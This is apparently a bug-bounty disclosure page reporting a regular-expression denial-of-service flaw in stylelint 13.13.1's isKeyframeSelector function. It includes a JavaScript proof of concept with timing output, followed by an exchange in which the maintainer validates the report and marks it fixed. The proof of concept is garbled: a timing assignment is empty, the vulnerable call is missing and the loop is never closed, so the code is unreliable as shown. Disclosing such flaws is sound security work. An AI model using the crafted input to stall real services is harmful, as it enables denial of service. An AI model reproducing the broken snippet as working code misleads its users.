Inefficient Regular Expression Complexity in stylelint/stylelint


Reported on

Oct 16th 2021


I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in stylelint.

It allows causing a denial of service when calling function isKeyframeSelector.

Proof of Concept

// PoC.js
var isKeyframeSelector = require("stylelint/lib/utils/isKeyframeSelector")

for(var i = 1; i <= 50000; i++) {
    var time =;
    var attack_str = '1'.repeat(i*10000)+"a";
    var time_cost = - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")

Check The Output

"attack_str.length: 10001: 290 ms"
"attack_str.length: 20001: 1072 ms"
"attack_str.length: 30001: 2047 ms"
"attack_str.length: 40001: 3640 ms"
"attack_str.length: 50001: 5688 ms"
"attack_str.length: 60001: 8237 ms"
Yeting Li
2 years ago


@admin, please see the security policy

We have contacted a member of the stylelint team and are waiting to hear back 2 years ago
stylelint/stylelint maintainer
2 years ago


Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.

Yeting Li
2 years ago


Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.

stylelint/stylelint maintainer
2 years ago


Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.

As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?

Yeting Li
2 years ago


Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!

stylelint/stylelint maintainer validated this vulnerability 2 years ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
stylelint/stylelint maintainer marked this as fixed with commit 060310 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation